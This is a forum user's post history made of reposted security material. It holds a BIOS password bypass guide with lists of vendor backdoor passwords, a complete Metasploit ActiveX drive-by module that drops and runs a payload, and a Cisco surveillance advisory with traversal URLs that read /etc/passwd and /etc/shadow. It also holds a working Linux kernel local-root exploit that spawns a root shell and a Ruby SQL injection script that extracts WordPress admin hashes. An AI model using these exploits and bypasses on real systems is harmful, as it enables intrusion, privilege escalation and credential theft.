
Gonzalez

Active Members
  • Posts: 1576
  • Days Won: 9

Posts posted by Gonzalez

  1. http://www.askvg.com/how-to-reset-remove-bypass-a-bios-or-cmos-password/

    BIOS passwords are used to add some extra security to computers. You can either set a password to prevent access to BIOS settings or to prevent PC from booting.

    But sometimes this extra security might become a pain when you forget the BIOS password or someone changes your system BIOS password intentionally.

    But there is no need to worry. There are many known ways to reset / remove / bypass the password:

    By removing CMOS battery

    By using motherboard jumper

    By using MS DOS command

    By using software

    By using Backdoor BIOS password

    Now I'll try to explain each method one by one:

    DISCLAIMER: This information is intended for experienced users. It is not intended for basic users, hackers, or computer thieves. Please do not try any of following procedures if you are not familiar with computer hardware. We'll not be responsible for the use or misuse of this information, including personal injury, loss of data or hardware damage. So use it at your own risk.

    By Removing CMOS Battery:

    Almost all motherboards use a small coin sized CMOS battery to store all BIOS settings along with the password. To reset the password, unplug the PC, open the cabinet and remove the CMOS battery for approx. 15-30 minutes and then put it back. It'll reset all BIOS settings as well as the password and you'll need to re-enter all settings.

    If it fails, then try to remove the battery for at least one hour.

    By Using Motherboard Jumper:

    Almost all motherboards contain a jumper that can clear all CMOS settings along with the BIOS password. The location of this jumper varies depending upon the motherboard brand. You should read your motherboard manual to check its location. If you don't have the manual, then look for the jumpers near the CMOS battery. Most manufacturers label the jumper as CLR, CLEAR, CLEAR CMOS, etc.

    When you find the jumper, look carefully. There will be 3 pins and the jumper will be joining the center pin to either the left or right pin. What you need to do is remove the jumper and join the center pin to the opposite pin, e.g., if the jumper joins the center pin to the left pin, then remove it and join the center pin to the right pin. Now wait for a few seconds, then again remove the jumper and join the center pin to the left pin.

    Make sure to turn the PC off before opening the cabinet and resetting the jumper.

    By Using MS DOS Command:

    This method works only if you have access to the system when it's turned on, because this method requires MS DOS. Open Command Prompt from the Programs menu and provide the following commands one by one:

    debug

    o 70 2E

    o 71 FF

    quit

    NOTE: The first character in the above commands is English alphabet "o" and not the number 0.

    After providing the above commands, restart your system and it should reset the CMOS Settings along with the BIOS password.

    If you are curious to know how it works, let me explain the above commands:

    In this method we are using the Debug tool of MS DOS. The "o" character at the start of these commands outputs the values to IO ports. The numbers 70 and 71 are the port numbers used to access CMOS memory. By providing the value FF we are telling the CMOS that there is an invalid checksum, and it resets the CMOS settings as well as the BIOS password.

    By Using Software:

    There are a few software tools which can also reset CMOS settings or the BIOS password or both within a few clicks. But as stated above, you should have access to a system which is turned on and should have access to MS DOS or MS Windows:

    CmosPwd

    KillCMOS

    By Using Backdoor BIOS Password:

    Some BIOS manufacturers put a backdoor password in the BIOS which always works irrespective of what password you have set in the BIOS. It's a master password which is used for testing and troubleshooting purposes.

    AMI BIOS Passwords:

    A.M.I.

    AAAMMMIII

    AMI?SW

    AMI_SW

    AMI

    BIOS

    CONDO

    HEWITT RAND

    LKWPETER

    MI

    Oder

    PASSWORD

    AWARD BIOS Passwords:

    01322222

    589589

    589721

    595595

    598598

    ALFAROME

    ALLy

    aLLy

    aLLY

    ALLY

    aPAf

    _award

    award

    AWARD_SW

    AWARD?SW

    AWARD SW

    AWARD PW

    AWKWARD

    awkward

    BIOSTAR

    CONCAT

    CONDO

    Condo

    d8on

    djonet

    HLT

    J64

    J256

    J262

    j332

    j322

    KDD

    Lkwpeter

    LKWPETER

    PINT

    pint

    SER

    SKY_FOX

    SYXZ

    syxz

    shift + syxz

    TTPTHA

    ZAAADA

    ZBAAACA

    ZJAAADC

    PHOENIX BIOS Passwords:

    BIOS

    CMOS

    phoenix

    PHOENIX

    Misc Common Passwords:

    ALFAROME

    BIOSTAR

    biostar

    biosstar

    CMOS

    cmos

    LKWPETER

    lkwpeter

    setup

    SETUP

    Syxz

    Wodj

    Other Manufacturer BIOS Passwords:

    Biostar - Biostar

    Compaq - Compaq

    Dell - Dell

    Enox - xo11nE

    Epox - central

    Freetech - Posterie

    IWill - iwill

    Jetway - spooml

    Packard Bell - bell9

    QDI - QDI

    Siemens - SKY_FOX

    TMC - BIGO

    Toshiba - Toshiba

    VOBIS & IBM - merlin

    NOTE: All these passwords are case-sensitive and are changed from time to time by manufacturers.

  2. ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpServer::HTML
      include Msf::Exploit::EXE

      def initialize(info={})
        super(update_info(info,
          'Name'           => "Honeywell HSC Remote Deployer ActiveX Remote Code Execution",
          'Description'    => %q{
            This module exploits a vulnerability found in the Honeywell HSC Remote Deployer
            ActiveX. This control can be abused by using the LaunchInstaller() function to
            execute an arbitrary HTA from a remote location. This module has been tested
            successfully with the HSC Remote Deployer ActiveX installed with HoneyWell EBI
            R410.1.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'juan vazquez'
            ],
          'References'     =>
            [
              [ 'CVE', '2013-0108' ],
              [ 'OSVDB', '90583' ],
              [ 'BID', '58134' ],
              [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi' ],
              [ 'URL', 'http://ics-cert.us-cert.gov/pdf/ICSA-13-053-02.pdf' ]
            ],
          'Payload'        =>
            {
              'Space'           => 2048,
              'StackAdjustment' => -3500
            },
          'DefaultOptions' =>
            {
              'InitialAutoRunScript' => 'migrate -f -k'
            },
          'Platform'       => 'win',
          'Targets'        =>
            [
              [ 'Automatic', {} ]
            ],
          'Privileged'     => false,
          'DisclosureDate' => "Feb 22 2013",
          'DefaultTarget'  => 0))
      end

      def exploit
        @var_exename = rand_text_alpha(5 + rand(5)) + ".exe"
        @dropped_files = [
          @var_exename
        ]
        super
      end

      def on_new_session(session)
        if session.type == "meterpreter"
          session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
        end

        @dropped_files.delete_if do |file|
          win_file = file.gsub("/", "\\\\")
          if session.type == "meterpreter"
            begin
              wintemp = session.fs.file.expand_path("%TEMP%")
              win_file = "#{wintemp}\\#{win_file}"
              session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
              session.fs.file.rm(win_file)
              print_good("Deleted #{file}")
              true
            rescue ::Rex::Post::Meterpreter::RequestError
              print_error("Failed to delete #{win_file}")
              false
            end
          end
        end
      end

      def build_hta(cli)
        var_shellobj     = rand_text_alpha(rand(5)+5)
        var_fsobj        = rand_text_alpha(rand(5)+5)
        var_fsobj_file   = rand_text_alpha(rand(5)+5)
        var_vbsname      = rand_text_alpha(rand(5)+5)
        var_writedir     = rand_text_alpha(rand(5)+5)

        var_origLoc      = rand_text_alpha(rand(5)+5)
        var_byteArray    = rand_text_alpha(rand(5)+5)
        var_writestream  = rand_text_alpha(rand(5)+5)
        var_strmConv     = rand_text_alpha(rand(5)+5)

        p = regenerate_payload(cli)
        exe = generate_payload_exe({ :code => p.encoded })

        # Doing in this way to bypass the ADODB.Stream restrictions on JS,
        # even when executing it as an "HTA" application
        # The encoding code has been stolen from ie_unsafe_scripting.rb
        print_status("Encoding payload into vbs/javascript/hta...")

        # Build the content that will end up in the .vbs file
        vbs_content = Rex::Text.to_hex(%Q|
          Dim #{var_origLoc}, s, #{var_byteArray}
          #{var_origLoc} = SetLocale(1033)
        |)
        # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)
        # for conversion with ADODB.Stream
        vbs_ary = []
        # The output of this loop needs to be as small as possible since it
        # gets repeated for every byte of the executable, ballooning it by a
        # factor of about 80k (the current size of the exe template). In its
        # current form, it's down to about 4MB on the wire
        exe.each_byte do |b|
          vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % b)})\n")
        end
        vbs_content << vbs_ary.join("")

        # Continue with the rest of the vbs file;
        # Use ADODB.Stream to convert from an ansi string to its byteArray equivalent
        # Then use ADODB.Stream again to write the binary to file.
        #print_status("Finishing vbs...")
        vbs_content << Rex::Text.to_hex(%Q|
          Dim #{var_strmConv}, #{var_writedir}, #{var_writestream}
          #{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{@var_exename}"

          Set #{var_strmConv} = CreateObject("ADODB.Stream")

          #{var_strmConv}.Type = 2
          #{var_strmConv}.Charset = "x-ansi"
          #{var_strmConv}.Open
          #{var_strmConv}.WriteText s, 0
          #{var_strmConv}.Position = 0
          #{var_strmConv}.Type = 1
          #{var_strmConv}.SaveToFile #{var_writedir}, 2

          SetLocale(#{var_origLoc})|)

        hta = <<-EOS
        <script>
          var #{var_shellobj} = new ActiveXObject("WScript.Shell");
          var #{var_fsobj} = new ActiveXObject("Scripting.FileSystemObject");
          var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");
          var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs",2,true);

          #{var_fsobj_file}.Write(unescape("#{vbs_content}"));
          #{var_fsobj_file}.Close();

          #{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
          #{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{@var_exename}", 0, false);
          #{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
          window.close();
        </script>
        EOS

        return hta
      end

      def on_request_uri(cli, request)
        agent = request.headers['User-Agent']

        if agent !~ /MSIE \d/
          print_error("Browser not supported: #{agent.to_s}")
          send_not_found(cli)
          return
        end

        uri = ((datastore['SSL']) ? "https://" : "http://")
        uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'])
        uri << ":#{datastore['SRVPORT']}"

        print_status("Request received for #{request.uri}")

        if request.uri =~ /\/SystemDisplays\/RemoteInstallWelcome.hta/
          hta = build_hta(cli)
          print_status("Sending HTA application")
          send_response(cli, hta, {'Content-Type'=>'application/hta'})
          return
        end

        html = <<-EOS
        <html>
        <body>
        <object id="RemoteInstaller" classid="clsid:0D080D7D-28D2-4F86-BFA1-D582E5CE4867">
        </object>
        <script>
          RemoteInstaller.LaunchInstaller("#{uri}", "", false);
        </script>
        </body>
        </html>
        EOS

        # we need to handle direct /SystemDisplays/RemoteInstallWelcome.hta requests
        proc = Proc.new do |cli, req|
          on_request_uri(cli, req)
        end

        add_resource({'Path' => "/SystemDisplays/RemoteInstallWelcome.hta", 'Proc' => proc}) rescue nil

        print_status("Sending html")
        send_response(cli, html, {'Content-Type'=>'text/html'})

      end

    end

  3. # Exploit Title: Cisco Video Surveillance Operations Manager Multiple vulnerabilities
    # Google Dork: intitle:"Video Surveillance Operations Manager > Login"
    # Date: 22 Feb 2013 reported to the vendor
    # Exploit Author: Bassem | bassem.co
    # Vendor Homepage: www.cisco.com
    # Version: Version 6.3.2
    # Tested on: Version 6.3.2


    #1- The application is vulnerable to Local file inclusion

    read_log.jsp and read_log.dep do not validate the name and location of the log
    file; an unauthenticated remote attacker can perform this.

    ---------------------------------------------
    read_log.jsp:
    /usr/BWhttpd/root/htdocs/BWT/utils/logs
    from /usr/BWhttpd/logs/<%= logName %>
    ---------------------------------------------
    ---------------------------------------------
    read_log.dep

    <%!
    protected LinkedList getBwhttpdLog( String logName, String theOrder ) {
        String logPath = "/usr/BWhttpd/logs/";
        String theLog = logPath + logName;
        LinkedList resultList = new LinkedList();
        try {
            BufferedReader in = new BufferedReader(new FileReader(theLog));
            String theLine = "";
            while( (theLine = in.readLine()) != null ) {
                if( theOrder.indexOf("descending") > -1 ) {
                    resultList.addFirst(theLine);
                } else {
                    resultList.addLast(theLine);
                }
            }
    -----------------------------------------------
    POC:

    http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
    http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow

    #####################################################################

    #2- The application is vulnerable to local file inclusion

    select and display log do not validate the log file names. If an attacker passes
    /etc/passwd through the HTTP POST request, the system will display it as a log
    file.

    POC:

    http://serverip/monitor/logselect.php


    #####################################################################


    #3 Cisco Video Surveillance Operations Manager Version 6.3.2 doesn't
    perform proper authentication for the management and view console;
    a remote attacker can gain access to the system and view the attached cameras
    without authentication.

    POC:

    http://serverip/broadware.jsp


    #####################################################################


    #4 Application is vulnerable to XSS

    The web application doesn't perform validation of the inputs/outputs for
    many of its pages, so it's vulnerable to XSS attacks.

    POC: http://serverip/vsom/index.php/"/title><script>alert("ciscoxss");</script>




    --
    Best Regards
    Bassem
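    A hardened counterpart of the getBwhttpdLog() fragment quoted in finding #1, written here in Python as an added example that is not part of the advisory or of Cisco's code: it confines the user-supplied log name to /usr/BWhttpd/logs and shows the advisory's traversal POC value being refused while an ordinary log name still reads in ascending or descending order. The allow-list pattern and the in-memory log contents are assumptions constructed for the demo.

```python
import posixpath
import re

# Directory the vulnerable read_log.jsp / read_log.dep prepend to the
# user-supplied log name (taken from the advisory).
LOG_DIR = "/usr/BWhttpd/logs"

# Constructed allow-list: a bare file name, no path separators, no leading dot.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")


def vulnerable_log_path(log_name):
    """Mirror of getBwhttpdLog(): logPath + logName with no validation."""
    return LOG_DIR + "/" + log_name


def resolve_log_path(log_name):
    """Return the confined path for log_name, or None if it must be refused.

    Two independent checks (defence in depth): the name must match the
    allow-list, and the lexically normalised path must still sit directly
    under LOG_DIR. The check runs on the already URL-decoded parameter, as
    the JSP sees it, so an encoded "..%2f" arrives as "../" and is refused.
    """
    if not SAFE_NAME.fullmatch(log_name):
        return None
    candidate = posixpath.normpath(posixpath.join(LOG_DIR, log_name))
    if posixpath.dirname(candidate) != LOG_DIR:
        return None
    return candidate


def read_log(log_name, order, read_lines):
    """Hardened counterpart of getBwhttpdLog(): same ascending/descending
    behaviour, but only after the name has been confined. read_lines(path)
    supplies the file contents so the example runs without the appliance."""
    path = resolve_log_path(log_name)
    if path is None:
        raise ValueError("refused log name: %r" % log_name)
    result = []
    for line in read_lines(path):
        if "descending" in order:
            result.insert(0, line)
        else:
            result.append(line)
    return result


# Constructed stand-in for the appliance's log directory.
FAKE_FS = {
    "/usr/BWhttpd/logs/bwhttpd.log": ["line one", "line two", "line three"],
}


def fake_read_lines(path):
    return FAKE_FS[path]


if __name__ == "__main__":
    poc = "../../../../../../../../../etc/passwd"  # log= value from the POC URL
    print("vulnerable:", vulnerable_log_path(poc))  # escapes LOG_DIR entirely
    print("hardened:  ", resolve_log_path(poc))     # None: refused
    print(read_log("bwhttpd.log", "descending", fake_read_lines))
```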

  4. Local root exploit for Fedora 18 x86_64 using nl_table to leverage the sock_diag_handlers[] vulnerability.


    /*
     * CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
     * This exploit uses nl_table to jump to a known location
     */

    #include <unistd.h>
    #include <sys/socket.h>
    #include <linux/netlink.h>
    #include <netinet/tcp.h>
    #include <errno.h>
    #include <linux/if.h>
    #include <linux/filter.h>
    #include <string.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <linux/sock_diag.h>
    #include <linux/inet_diag.h>
    #include <linux/unix_diag.h>
    #include <sys/mman.h>

    typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
    typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
    _commit_creds commit_creds;
    _prepare_kernel_cred prepare_kernel_cred;
    unsigned long sock_diag_handlers, nl_table;

    /* Executed in kernel context once the out-of-bounds handler call lands here */
    int __attribute__((regparm(3)))
    kernel_code(void)
    {
        commit_creds(prepare_kernel_cred(0));
        return -1;
    }

    /* Resolve a kernel symbol address by scanning /proc/kallsyms */
    unsigned long
    get_symbol(char *name)
    {
        FILE *f;
        unsigned long addr;
        char dummy, sym[512];
        int ret = 0;

        f = fopen("/proc/kallsyms", "r");
        if (!f) {
            return 0;
        }

        while (ret != EOF) {
            ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
            if (ret == 0) {
                fscanf(f, "%s\n", sym);
                continue;
            }
            if (!strcmp(name, sym)) {
                printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
                fclose(f);
                return addr;
            }
        }
        fclose(f);

        return 0;
    }

    int main(int argc, char *argv[])
    {
        int fd;
        unsigned family;
        struct {
            struct nlmsghdr nlh;
            struct unix_diag_req r;
        } req;
        char buf[8192];

        if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0) {
            printf("Can't create sock diag socket\n");
            return -1;
        }

        memset(&req, 0, sizeof(req));
        req.nlh.nlmsg_len = sizeof(req);
        req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
        req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
        req.nlh.nlmsg_seq = 123456;

        req.r.udiag_states = -1;
        req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

        commit_creds = (_commit_creds) get_symbol("commit_creds");
        prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
        sock_diag_handlers = get_symbol("sock_diag_handlers");
        nl_table = get_symbol("nl_table");

        if (!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table) {
            printf("some symbols are not available!\n");
            exit(1);
        }

        /* Unchecked sdiag_family indexes sock_diag_handlers[]; pick the index
         * that lands on nl_table, whose first entry is a user-controlled pointer */
        family = (nl_table - sock_diag_handlers) / 8;
        printf("family=%u\n", family);
        req.r.sdiag_family = family;

        if (family > 255) {
            printf("nl_table is too far!\n");
            exit(1);
        }

        unsigned long mmap_start, mmap_size;
        mmap_start = 0x100000000;
        mmap_size = 0x200000;
        printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);

        if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
                 MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
            printf("mmap fault\n");
            exit(1);
        }
        memset((void*)mmap_start, 0x90, mmap_size);

        char jump[] = "\x55"                          // push %rbp
                      "\x48\x89\xe5"                  // mov %rsp, %rbp
                      "\x48\xc7\xc0\x00\x00\x00\x00"  // mov $imm32, %rax (patched below)
                      "\xff\xd0"                      // call *%rax
                      "\x5d"                          // pop %rbp
                      "\xc3";                         // ret

        unsigned int *asd = (unsigned int*) &jump[7];
        *asd = (unsigned int)kernel_code;
        printf("&kernel_code = %x\n", (unsigned int) kernel_code);

        memcpy((char *)mmap_start + mmap_size - sizeof(jump), jump, sizeof(jump));

        if (send(fd, &req, sizeof(req), 0) < 0) {
            printf("bad send\n");
            close(fd);
            return -1;
        }

        printf("uid=%d, euid=%d\n", getuid(), geteuid());

        if (!getuid())
            system("/bin/sh");

        return 0;
    }

  5. #!/usr/bin/ruby
    #
    # Exploit Title: WordPress LeagueManager Plugin v3.8 SQL Injection
    # Google Dork: inurl:"/wp-content/plugins/leaguemanager/"
    # Date: 13/03/13
    # Exploit Author: Joshua Reynolds
    # Vendor Homepage: http://wordpress.org/extend/plugins/leaguemanager/ (No longer active)
    # Software Link: http://downloads.wordpress.org/plugin/leaguemanager.3.8.zip (No longer active)
    # Version: 3.8
    # Tested on: BT5R1 - Ubuntu 10.04.2 LTS
    # CVE: CVE-2013-1852
    #-----------------------------------------------------------------------------------------
    #Description:
    #
    #An SQL Injection vulnerability exists in the league_id parameter of a function call made
    #by the leaguemanager_export page. This request is processed within the leaguemanager.php:
    #
    #if ( isset($_POST['leaguemanager_export']))
    # $lmLoader->adminPanel->export($_POST['league_id'], $_POST['mode']);
    #
    #Which does not sanitize of SQL injection, and is passed to the admin/admin.php page
    #into the export( $league_id, $mode ) function which also does not sanitize for SQL injection
    #when making this call: $this->league = $leaguemanager->getLeague($league_id);
    #The information is then echoed to a CSV file that is then provided.
    #
    #Since no authentication is required when making a POST request to this page,
    #i.e /wp-admin/admin.php?page=leaguemanager-export the request can be made with no established
    #session.
    #
    #Fix:
    #
    #A possible fix for this would be to cast the league_id to an integer during any
    #of the function calls. The following changes can be made in the leaguemanager.php file:
    #$lmLoader->adminPanel->export((int)$_POST['league_id'], $_POST['mode']);
    #
    #These functions should also not be available to public requests, and thus session handling
    #should also be checked prior to the requests being processed within the admin section.
    #
    #The responsible disclosure processes were distorted by the fact that the author no longer
    #supports his well established plugin, and there are currently no maintainers. After
    #e-mailing the folks over at plugins@wordpress.org they've decided to discontinue the plugin
    #and not patch the vulnerability.
    #
    #The following ruby exploit will retrieve the administrator username and the salted
    #password hash from a given site with the plugin installed:
    #------------------------------------------------------------------------------------------
    #Exploit:

    require 'net/http'
    require 'uri'

    if ARGV.length == 2
      post_params = {
        'league_id' => '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,'\
                       '9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--',
        'mode' => 'teams',
        'leaguemanager_export' => 'Download+File'
      }

      target_url = ARGV[0] + ARGV[1] + "/wp-admin/admin.php?page=leaguemanager-export"

      begin
        resp = Net::HTTP.post_form(URI.parse(target_url), post_params)
      rescue
        puts "Invalid URL..."
      end

      if resp.nil?
        # print_error is a Metasploit helper, not available in plain Ruby
        puts "No response received..."
      elsif resp.code != "200"
        puts "Page doesn't exist!"
      else
        # The CSV export echoes the UNION result: column 21 carries user_login,
        # the user_pass hash sits before column 15
        admin_login = resp.body.scan(/21\t(.*)\t2.*0\t(.*)\t15/)

        if admin_login.length > 0
          puts "Username: #{admin_login[0][0]}"
          puts "Hash: #{admin_login[0][1]}"
          puts "\nNow go crack that with Hashcat :)"
        else
          puts "Username and hash not received. Maybe it's patched?"
        end
      end
    else
      puts "Usage: ruby LeagueManagerSQLI.rb \"http://example.com\" \"/wordpress\""
    end

    #Shout outs: Graycon Group Security Team, Red Hat Security Team, Miss Umer, Tim Williams, Dr. Wu, friends & family.
    #
    #Contact:
    #Mail: infosec4breakfast@gmail.com
    #Blog: infosec4breakfast.com
    #Twitter: @jershmagersh
    #Youtube: youtube.com/user/infosec4breakfast
